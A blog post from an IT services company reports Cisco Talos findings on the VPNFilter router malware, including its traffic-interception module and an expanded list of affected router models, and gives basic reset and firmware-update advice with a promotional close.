Preparing…
952-223-4422
109 Rice Street South Jordan MN 55352

VPNFilter Malware worse than we thought

Recently we created an article giving a detailed explanation on a current threat facing over 500,000 devices, known as the VPNFilter malware.

This malware had become a prominent issue fast and had been tied to an origin in Russia. Initially it was thought that resetting your homes router and modem would address the problem, but as more investigations ensued, it was realized we were wrong...

VPNFilter Malware

Two weeks ago it was reported that more than 500,000 consumer-grade routers in 54 countries were infected with malware and that this malware gave way to the possibility of many nefarious purposes.

Recently however, Cisco's researchers from Talos security have come across additional understandings of the inner workings of this malware. The researchers have claimed that the malware runs on a much broader base of models, many being from previously unaffected manufacturers. This bodes a stronger threat than initially perceived.

New Tricks

The VPNFilter has been found to be able to perform actions such as man-in-the-middle attack's on incoming web traffic. This module of the malware can use the ssler module to inject dangerous payloads into traffic as it passes through infected routers. Not only that, but the module can actually modify the content that is delivered by websites and further, tailor payloads to exploit specific devices attached to the infected routers.

The ssler module is also designed to capture sensitive data passed between endpoints  and the outside internet. It accomplishes this by inspecting web URLs for specific signs that will allow for the transmission of passwords and other sensitive data so it can be copied and sent to the servers of the attackers.

In order to bypass the TLS encryption that is made to prevent these very such attacks, the ssler module attempts to downgrade HTTPS connecitons into plaintext HTTP traffic. By doing this they can get around stronger security that might be in place, and also strips away the data compression provided by the gzip application so that the plain text traffic is easier to modify.

Loss of traffic control

Cisco describes the potential danger in this newly evolved form of malware that the attackers are using, as significantly more dangerous than first expected, due to its use of the routers themselves as an attacking platform.

The malware could potentially make users see incorrect information, for example, while a user is on their online banking, checking over their accounts, things may look normal, but in the background their account is actually being siphoned, and there is no visual indication of such activity. This malware has the potential to PGP keys and things of that sort, they can manipulate anything going in and out of the device.

The newly infected

Cisco's Talos said that VPNFilter also has a much wider audience in terms of the devices that are affected. Previously there had been many exceptions to the long list of potential "at risk" router models, but now it seems there are many, many, many more in danger.

The following is a list of updated models that can be affected or have known to be affected by this malware:

Asus Devices:
RT-AC66U (new)
RT-N10 (new)
RT-N10E (new)
RT-N10U (new)
RT-N56U (new)
RT-N66U (new)

D-Link Devices:
DES-1210-08P (new)
DIR-300 (new)
DIR-300A (new)
DSR-250N (new)
DSR-500N (new)
DSR-1000 (new)
DSR-1000N (new)

Huawei Devices:
HG8245 (new)

Linksys Devices:
E1200
E2500
E3000 (new)
E3200 (new)
E4200 (new)
RV082 (new)
WRVS4400N

Mikrotik Devices:
CCR1009 (new)
CCR1016
CCR1036
CCR1072
CRS109 (new)
CRS112 (new)
CRS125 (new)
RB411 (new)
RB450 (new)
RB750 (new)
RB911 (new)
RB921 (new)
RB941 (new)
RB951 (new)
RB952 (new)
RB960 (new)
RB962 (new)
RB1100 (new)
RB1200 (new)
RB2011 (new)
RB3011 (new)
RB Groove (new)
RB Omnitik (new)
STX5 (new)

Netgear Devices:
DG834 (new)
DGN1000 (new)
DGN2200
DGN3500 (new)
FVS318N (new)
MBRN3000 (new)
R6400
R7000
R8000
WNR1000
WNR2000
WNR2200 (new)
WNR4000 (new)
WNDR3700 (new)
WNDR4000 (new)
WNDR4300 (new)
WNDR4300-TN (new)
UTM50 (new)

QNAP Devices:
TS251
TS439 Pro
Other QNAP NAS devices running QTS software

TP-Link Devices:
R600VPN
TL-WR741ND (new)
TL-WR841N (new)

Ubiquiti Devices:
NSM2 (new)
PBE M5 (new)

Upvel Devices:
Unknown Models* (new)

ZTE Devices:
ZXHN H108N (new)

 

As you can see, there is an extensive list of known infected routers. Many of these are very common in households today and should be looked over thoroughly to see if yours is listed. If yours is listed, it is recommended that you reboot your device or if possible restore to factory defaults, then flash the firmware with the latest available, if possible without even using the internet.

The malware affects known problems in routers, and the known flaws have been patched by their producers, so in order to ensure your device does not get infected, it is best to avoid exposing admin interfaces or services on the internet. Call your local I.T. service providers for help in any of these areas.

Keep up to date on your technology and it's vulnerabilities and solutions with RE2Tech. We make I.T. easy! 

Have you taken precautions? Is your sensitive information at risk?

Give us a call or send us an email for all your I.T needs! We at Re2tech make I.T. happen!

Phone: 952-223-4422

[email protected]

Leave a Reply